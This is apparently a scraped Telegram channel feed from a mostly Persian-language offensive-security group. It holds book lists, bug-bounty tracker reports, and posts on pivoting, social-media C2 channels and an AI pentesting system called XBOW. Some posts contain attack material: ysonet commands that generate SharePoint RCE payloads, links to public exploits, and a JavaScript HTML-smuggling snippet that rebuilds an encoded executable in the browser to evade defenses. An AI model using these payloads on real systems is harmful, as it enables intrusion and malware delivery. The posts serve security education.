✅ Nice Books :
1. The Web Application Hacker's Handbook –Dafydd Stuttard & Marcus Pinto
2. The Hacker Playbook 2 & 3 – Peter Kim (not recommended)
3. Hacking: The Art of Exploitation – Jon Erickson
4. Advanced Web Attacks and Exploitation – Dafydd Stuttard
5. Web Security for Developers – Malcolm McDonald
6. Real-World Web Application Security – Andrew Hoffman
7. Bug Bounty Hunting Essentials – Carlos A. Lozano
8. Black Hat Python – Justin Seitz
#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #Pentesting #EthicalHacking #Exploitation #AdvancedHacking
⭐️ @ZeroSec_team
1. The Web Application Hacker's Handbook –Dafydd Stuttard & Marcus Pinto
2. The Hacker Playbook 2 & 3 – Peter Kim (not recommended)
3. Hacking: The Art of Exploitation – Jon Erickson
4. Advanced Web Attacks and Exploitation – Dafydd Stuttard
5. Web Security for Developers – Malcolm McDonald
6. Real-World Web Application Security – Andrew Hoffman
7. Bug Bounty Hunting Essentials – Carlos A. Lozano
8. Black Hat Python – Justin Seitz
#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #Pentesting #EthicalHacking #Exploitation #AdvancedHacking
⭐️ @ZeroSec_team
👍3❤1
DE&TH_Guide_1_3.pdf
2 MB
#DFIR
#Whitepaper
#Blue_Team_Techniques
"Detection Engineering & Threat Hunting (DE&TH) Guide", ver.1.3, Aug. 2025.
⭐️ @ZeroSec_team
#Whitepaper
#Blue_Team_Techniques
"Detection Engineering & Threat Hunting (DE&TH) Guide", ver.1.3, Aug. 2025.
⭐️ @ZeroSec_team
❤1🙏1
#rce #pentest #redteam #ad #sharepoint #cve
CVE-2025-53770: SharePoint RCE (ToolShell)
Exploit: https://github.com/soltanali0/CVE-2025-53770-Exploit
Upd: https://github.com/irsdl/ysonet
Patched: July 20, 2025
⭐️ @ZeroSec_team
CVE-2025-53770: SharePoint RCE (ToolShell)
Exploit: https://github.com/soltanali0/CVE-2025-53770-Exploit
Upd: https://github.com/irsdl/ysonet
ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 1 -c "calc"
ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 2 -c "C:\\temp\\ExploitClass.cs;System.dll"
Patched: July 20, 2025
⭐️ @ZeroSec_team
GitHub
GitHub - soltanali0/CVE-2025-53770-Exploit: SharePoint WebPart Injection Exploit Tool
SharePoint WebPart Injection Exploit Tool. Contribute to soltanali0/CVE-2025-53770-Exploit development by creating an account on GitHub.
❤4
HTML Smuggling چیه و چرا خطرناکه؟
یه تکنیک خفن تو حملات سایبریه که هکر باهاش میتونه بدافزار رو بدون دانلود از سرور خودش، داخل مرورگر قربانی تولید کنه!
یعنی چی؟ یعنی بهجای اینکه فایل مخرب مثل malware.exe رو مستقیم به قربانی بده، یه فایل HTML میفرسته که توش یه کد جاوااسکریپت هست. این کد تو مرورگر اجرا میشه و فایل رو از صفر میسازه و به قربانی میده!
مثال:
یه فایل اجرایی که:
نه از نت دانلود شده
نه توی ترافیک دیده میشه
نه فایروال جلوش رو میگیره
و نه حتی آنتیویروس متوجه میشه!
این یکی از روشهای محبوب برای Initial Access هست.
#HTML_Smuggling #RedTeam #CyberSecurity #Phishing #InitialAccess
⭐️ @ZeroSec_team
یه تکنیک خفن تو حملات سایبریه که هکر باهاش میتونه بدافزار رو بدون دانلود از سرور خودش، داخل مرورگر قربانی تولید کنه!
یعنی چی؟ یعنی بهجای اینکه فایل مخرب مثل malware.exe رو مستقیم به قربانی بده، یه فایل HTML میفرسته که توش یه کد جاوااسکریپت هست. این کد تو مرورگر اجرا میشه و فایل رو از صفر میسازه و به قربانی میده!
مثال:
let file = atob("TVqQAAMAAAAEAAAA...");
let blob = new Blob([Uint8Array.from(file, c => c.charCodeAt(0))]);
let url = URL.createObjectURL(blob);
window.open(url); // یا auto downloadیه فایل اجرایی که:
نه از نت دانلود شده
نه توی ترافیک دیده میشه
نه فایروال جلوش رو میگیره
و نه حتی آنتیویروس متوجه میشه!
این یکی از روشهای محبوب برای Initial Access هست.
#HTML_Smuggling #RedTeam #CyberSecurity #Phishing #InitialAccess
⭐️ @ZeroSec_team
❤5👍2
«سلام به دنیای جدید امنیت با ظهور هوش مصنوعی»
دنیای آیندهی امنیت، با ظهور هوش مصنوعی بر دو پایه استواره:
۱. استفاده از AI بهعنوان ابزاری فوقپیشرفته
۲. بهرهگیری از خطاهای انسانی بهعنوان راه ورود
#XBOW #HackerOne #AI #CyberSecurity #RedTeam
⭐️ @ZeroSec_team
دنیای آیندهی امنیت، با ظهور هوش مصنوعی بر دو پایه استواره:
۱. استفاده از AI بهعنوان ابزاری فوقپیشرفته
۲. بهرهگیری از خطاهای انسانی بهعنوان راه ورود
#XBOW #HackerOne #AI #CyberSecurity #RedTeam
⭐️ @ZeroSec_team
❤1🔥1😱1
📊 Watcher Summary Report
🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 51 new items
🔹 INTIGRITI: 3 new items
🔹 YESWEHACK: 8 new items
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 51 new items
🔹 INTIGRITI: 3 new items
🔹 YESWEHACK: 8 new items
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤2
Pivoting: تسلط مرحله به مرحله بر شبکههای داخلی
Pivoting یک تکنیک حیاتی در مرحلهی Post-Exploitation و بخش مرکزی Lateral Movement محسوب میشود.
Pivoting یعنی استفاده از host تسخیر شده به عنوان نقطه عبور (bridge node) برای رسیدن به subnetهایی که از شبکهی مهاجم (attacker C2) بهطور مستقیم قابل دسترسی نیستند (non-routable/internal segments)
سناریوی رایج:
Exploit → Initial Access به DMZ
Recon: شناسایی internal segments (مثلاً با ARP scan یا route enumeration)
Pivot Setup: ایجاد مسیر ارتباطی
حرکت به سمت اهداف high-value مثل Domain Controllers، فایلسرورها یا اپهای مدیریتی داخلی
قبل از هر pivot باید route ها، firewall rule ها و ACL ها بررسی شوند. بدون visibility دقیق، هر گونه ترافیک غیرعادی میتواند باعث شناسایی عملیات شود.
#RedTeamOps #Pivoting #NetworkSegmentationBypass #AdvancedPostExploitation
⭐️ @ZeroSec_team
Pivoting یک تکنیک حیاتی در مرحلهی Post-Exploitation و بخش مرکزی Lateral Movement محسوب میشود.
Pivoting یعنی استفاده از host تسخیر شده به عنوان نقطه عبور (bridge node) برای رسیدن به subnetهایی که از شبکهی مهاجم (attacker C2) بهطور مستقیم قابل دسترسی نیستند (non-routable/internal segments)
سناریوی رایج:
Exploit → Initial Access به DMZ
Recon: شناسایی internal segments (مثلاً با ARP scan یا route enumeration)
Pivot Setup: ایجاد مسیر ارتباطی
حرکت به سمت اهداف high-value مثل Domain Controllers، فایلسرورها یا اپهای مدیریتی داخلی
قبل از هر pivot باید route ها، firewall rule ها و ACL ها بررسی شوند. بدون visibility دقیق، هر گونه ترافیک غیرعادی میتواند باعث شناسایی عملیات شود.
#RedTeamOps #Pivoting #NetworkSegmentationBypass #AdvancedPostExploitation
⭐️ @ZeroSec_team
❤1👍1👎1🔥1
📊 Watcher Summary Report
🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 6 new items
🔹 INTIGRITI: 33 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 6 new items
🔹 INTIGRITI: 33 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤1👍1🎉1
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤3
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤4
#WebApp_Security
1. Exploiting an ORM Injection to Steal Cryptocurrency from an Online Shooter
https://blog.p1.gs/writeup/2025/07/06/Hacking-a-crypto-game
2. Delivering PHP RCE to the Local Network Servers
https://github.com/ZeroMemoryEx/PHP-CGI-INTERNAL-RCE
3. XSS in Google IDX Workstation
https://sudistark.github.io/2025/07/02/idx.html
♦️@ZeroSec_team
1. Exploiting an ORM Injection to Steal Cryptocurrency from an Online Shooter
https://blog.p1.gs/writeup/2025/07/06/Hacking-a-crypto-game
2. Delivering PHP RCE to the Local Network Servers
https://github.com/ZeroMemoryEx/PHP-CGI-INTERNAL-RCE
3. XSS in Google IDX Workstation
https://sudistark.github.io/2025/07/02/idx.html
♦️@ZeroSec_team
blog.p1.gs
Exploiting an ORM Injection to Steal Cryptocurrency from an Online Shooter · xEHLE
❤2
ورود | XBOW جایگزین متخصصان امنیت سایبری شده؟ واقعیت پشت پرده هکر هوش مصنوعی که HackerOne را تصاحب کرد
نویسنده: غلام محیالدین
مدت مطالعه: ۳ دقیقه | تاریخ: ۲۵ جولای ۲۰۲۵
یک مدعی جدید در دنیای امنیت سایبری
اگر هنوز اسم XBOW را نشنیدهاید، همین حالا از بقیه عقبید.
XBOW، ساختهی Oege de Moor (خالق GitHub Copilot)، یک تستر نفوذ خودمختار با هوش مصنوعی است که پایههای امنیت سایبری را به لرزه انداخته. در ژوئن ۲۰۲۵، XBOW با پشت سر گذاشتن هزاران هکر حرفهای، به رتبهی اول لیست HackerOne در آمریکا رسید.
اما این فقط یک ابزار معمولی نیست. XBOW خودش باگهای واقعی را کشف میکند، آنها را اعتبارسنجی میکند و گزارش میدهد آنهم بدون دخالت انسان.
یا واقعا اینطور است؟
بیایید بین تبلیغات و واقعیت، مرز بگذاریم.
XBOW دقیقاً چه کاری انجام میدهد؟
XBOW یک سیستم هوش مصنوعی است که برای اجرای تست نفوذ تهاجمی خودکار طراحی شده. این سیستم webpapp ها را crwal و scan کرده و آسیبپذیریهایی مثل:
XSS, CSRF, SSRF, RCE
را کشف می کند.
و فقط به کشف بسنده نمیکند. آنها را تأیید میکند، Exploit میکند و گزارشهای باگ معتبر ارسال میکند.
در آزمونهایی مثل PentesterLab و Web Security Academy، XBOW بین ۷۵ تا ۸۵٪ از چالشها را حل کرد. کاری که برای انسان ۴۰ ساعت زمان میبرد، XBOW در کمتر از ۳۰ دقیقه انجام داد.
شگفتانگیز؟ بله. اما داستان به همینجا ختم نمیشود.
نه آنقدر هم خودکار…
سازندگان XBOW ادعا میکنند که این سیستم "کاملاً خودمختار" است.
اما متخصصان و افراد پشتصحنه، نظر دیگری دارند.
واقعیت چیست؟
انسانها محدوده باگ بانتی را تعیین میکنند
مهندسان اهداف را اولویتبندی میکنند
یافتهها قبل از ارسال بهصورت دستی اعتبارسنجی میشوند
اگر خطایی رخ دهد، اسکریپتهای جایگزین یا بررسی LLM (مدلهای زبانی بزرگ) فعال میشود
یعنی بله، بخش زیادی از کار خودکار است اما همچنان بخشی از یک خط لوله انسانی محسوب میشود.
XBOW چه چیزهایی را نمیتواند انجام دهد؟
اگرچه XBOW در کشف آسیبپذیریهای رایج عملکردی خیرهکننده دارد، اما در برابر نقایص منطقی پیچیده کاملاً کور است.
محدودیتهای آن:
🧠 باگهای منطقی مرتبط با بیزینس (مثل بررسی اشتباه سطح دسترسی)
🔗 اکسپلویتهای زنجیرهای چندمرحلهای
🔐 باگهایی که وابسته به محیط خاصی هستند
🤝 مهندسی اجتماعی و حملات فیزیکی
🎯 اولویتبندی ریسک بر اساس زمینه واقعی کسبوکار
به زبان ساده: هوش مصنوعی هنوز شهود و خلاقیت ندارد — دو عنصر حیاتی در دنیای امنیت سایبری مدرن.
آیا جایگزین شغلهای امنیتی خواهد شد؟
بیایید سر اصل مطلب برویم.
✅ بله… برای نقشهای تکراری و سطح پایه.
اگر شغلتان فقط به اسکن XSS یا استفاده سطحی از Burp Suite محدود شده — قابل جایگزینی هستید. این دقیقاً همان نقطه قوت XBOW است.
❌ خیر… برای متخصصان باتجربه.
این صنعت همچنان به انسانهایی نیاز دارد که توانایی انجام موارد زیر را دارند:
تحلیل فرایندهای تجاری
تفکر مهاجمانه
زنجیرهسازی آسیبپذیریها
اجرای حملات Red/Purple Team
مدیریت ریسک در شرایط واقعی
درواقع، AI در حال ایجاد نقشهای جدید در امنیت است:
نقشهایی مثل ناظر سیستمهای هوش مصنوعی، تحلیلگر تهدیدات، ردتیمهای ترکیبی با کمک AI و...
درحالت کلی این رایتاپ تا اخر امسال احتمالا درسته ولی بعدا میزنه همه هانترارو اوت میکنه این هوش مصنوعی
#RedTeam #XBOW #Hacke #BugBounty
⭐️ @ZeroSec_team
نویسنده: غلام محیالدین
مدت مطالعه: ۳ دقیقه | تاریخ: ۲۵ جولای ۲۰۲۵
یک مدعی جدید در دنیای امنیت سایبری
اگر هنوز اسم XBOW را نشنیدهاید، همین حالا از بقیه عقبید.
XBOW، ساختهی Oege de Moor (خالق GitHub Copilot)، یک تستر نفوذ خودمختار با هوش مصنوعی است که پایههای امنیت سایبری را به لرزه انداخته. در ژوئن ۲۰۲۵، XBOW با پشت سر گذاشتن هزاران هکر حرفهای، به رتبهی اول لیست HackerOne در آمریکا رسید.
اما این فقط یک ابزار معمولی نیست. XBOW خودش باگهای واقعی را کشف میکند، آنها را اعتبارسنجی میکند و گزارش میدهد آنهم بدون دخالت انسان.
یا واقعا اینطور است؟
بیایید بین تبلیغات و واقعیت، مرز بگذاریم.
XBOW دقیقاً چه کاری انجام میدهد؟
XBOW یک سیستم هوش مصنوعی است که برای اجرای تست نفوذ تهاجمی خودکار طراحی شده. این سیستم webpapp ها را crwal و scan کرده و آسیبپذیریهایی مثل:
XSS, CSRF, SSRF, RCE
را کشف می کند.
و فقط به کشف بسنده نمیکند. آنها را تأیید میکند، Exploit میکند و گزارشهای باگ معتبر ارسال میکند.
در آزمونهایی مثل PentesterLab و Web Security Academy، XBOW بین ۷۵ تا ۸۵٪ از چالشها را حل کرد. کاری که برای انسان ۴۰ ساعت زمان میبرد، XBOW در کمتر از ۳۰ دقیقه انجام داد.
شگفتانگیز؟ بله. اما داستان به همینجا ختم نمیشود.
نه آنقدر هم خودکار…
سازندگان XBOW ادعا میکنند که این سیستم "کاملاً خودمختار" است.
اما متخصصان و افراد پشتصحنه، نظر دیگری دارند.
واقعیت چیست؟
انسانها محدوده باگ بانتی را تعیین میکنند
مهندسان اهداف را اولویتبندی میکنند
یافتهها قبل از ارسال بهصورت دستی اعتبارسنجی میشوند
اگر خطایی رخ دهد، اسکریپتهای جایگزین یا بررسی LLM (مدلهای زبانی بزرگ) فعال میشود
یعنی بله، بخش زیادی از کار خودکار است اما همچنان بخشی از یک خط لوله انسانی محسوب میشود.
XBOW چه چیزهایی را نمیتواند انجام دهد؟
اگرچه XBOW در کشف آسیبپذیریهای رایج عملکردی خیرهکننده دارد، اما در برابر نقایص منطقی پیچیده کاملاً کور است.
محدودیتهای آن:
🧠 باگهای منطقی مرتبط با بیزینس (مثل بررسی اشتباه سطح دسترسی)
🔗 اکسپلویتهای زنجیرهای چندمرحلهای
🔐 باگهایی که وابسته به محیط خاصی هستند
🤝 مهندسی اجتماعی و حملات فیزیکی
🎯 اولویتبندی ریسک بر اساس زمینه واقعی کسبوکار
به زبان ساده: هوش مصنوعی هنوز شهود و خلاقیت ندارد — دو عنصر حیاتی در دنیای امنیت سایبری مدرن.
آیا جایگزین شغلهای امنیتی خواهد شد؟
بیایید سر اصل مطلب برویم.
✅ بله… برای نقشهای تکراری و سطح پایه.
اگر شغلتان فقط به اسکن XSS یا استفاده سطحی از Burp Suite محدود شده — قابل جایگزینی هستید. این دقیقاً همان نقطه قوت XBOW است.
❌ خیر… برای متخصصان باتجربه.
این صنعت همچنان به انسانهایی نیاز دارد که توانایی انجام موارد زیر را دارند:
تحلیل فرایندهای تجاری
تفکر مهاجمانه
زنجیرهسازی آسیبپذیریها
اجرای حملات Red/Purple Team
مدیریت ریسک در شرایط واقعی
درواقع، AI در حال ایجاد نقشهای جدید در امنیت است:
نقشهایی مثل ناظر سیستمهای هوش مصنوعی، تحلیلگر تهدیدات، ردتیمهای ترکیبی با کمک AI و...
درحالت کلی این رایتاپ تا اخر امسال احتمالا درسته ولی بعدا میزنه همه هانترارو اوت میکنه این هوش مصنوعی
#RedTeam #XBOW #Hacke #BugBounty
⭐️ @ZeroSec_team
❤2🔥1
Sin0x001
ورود | XBOW جایگزین متخصصان امنیت سایبری شده؟ واقعیت پشت پرده هکر هوش مصنوعی که HackerOne را تصاحب کرد نویسنده: غلام محیالدین مدت مطالعه: ۳ دقیقه | تاریخ: ۲۵ جولای ۲۰۲۵ یک مدعی جدید در دنیای امنیت سایبری اگر هنوز اسم XBOW را نشنیدهاید، همین حالا از بقیه…
نترسید نترسید ما همه باهم هستیم✊
🍾3⚡1😁1🤣1
📊 Watcher Summary Report
🔹 BUGCROWD: 6 new items
🔹 HACKERONE: 205 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 6 new items
🔹 HACKERONE: 205 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
👍2❤1
Social Media-Based C2 Channels
در چندین عملیات APT از جمله حملهی APT29 (HAMMERTOSS)، adversary از موارد زیر بهعنوان C2 استفاده کرده:
Twitter – base64-encoded tasking in tweets
GitHub – hosting payloads or encoded commands
Imgur/Instagram – steganographic command embedding
Telegram Bots – encrypted 2-way comms
Slack/Discord – webhook-based communication
YouTube Comments – hidden indicators and instructions
Pastebin/Gist – staging encoded content
روشهای معمول شامل:
Domain fronting
Covert channel via stego
DNS over HTTPS callbacks
Abuse of social APIs
مزیتها:
Evasion از signature-based detection
Legitimate platform traffic
Persistence in hostile environments
#RedTeam #C2 #APT #MITRE #TTP #ThreatOps
⭐️ @ZeroSec_team
در چندین عملیات APT از جمله حملهی APT29 (HAMMERTOSS)، adversary از موارد زیر بهعنوان C2 استفاده کرده:
Twitter – base64-encoded tasking in tweets
GitHub – hosting payloads or encoded commands
Imgur/Instagram – steganographic command embedding
Telegram Bots – encrypted 2-way comms
Slack/Discord – webhook-based communication
YouTube Comments – hidden indicators and instructions
Pastebin/Gist – staging encoded content
روشهای معمول شامل:
Domain fronting
Covert channel via stego
DNS over HTTPS callbacks
Abuse of social APIs
مزیتها:
Evasion از signature-based detection
Legitimate platform traffic
Persistence in hostile environments
#RedTeam #C2 #APT #MITRE #TTP #ThreatOps
⭐️ @ZeroSec_team
❤5
#reversing
#Kernel_Security
Debugging the Pixel 8 kernel via KGDB
https://xairy.io/articles/pixel-kgdb
// The instructions cover building and flashing a custom Pixel 8 kernel to enable KGDB, breaking into KGDB either via ADB by relying on /proc/sysrq-trigger or purely over a serial connection by sending the SysRq-G sequence, and attaching GDB to the Pixel 8 kernel
♦️@ZeroSec_team
#Kernel_Security
Debugging the Pixel 8 kernel via KGDB
https://xairy.io/articles/pixel-kgdb
// The instructions cover building and flashing a custom Pixel 8 kernel to enable KGDB, breaking into KGDB either via ADB by relying on /proc/sysrq-trigger or purely over a serial connection by sending the SysRq-G sequence, and attaching GDB to the Pixel 8 kernel
♦️@ZeroSec_team
❤2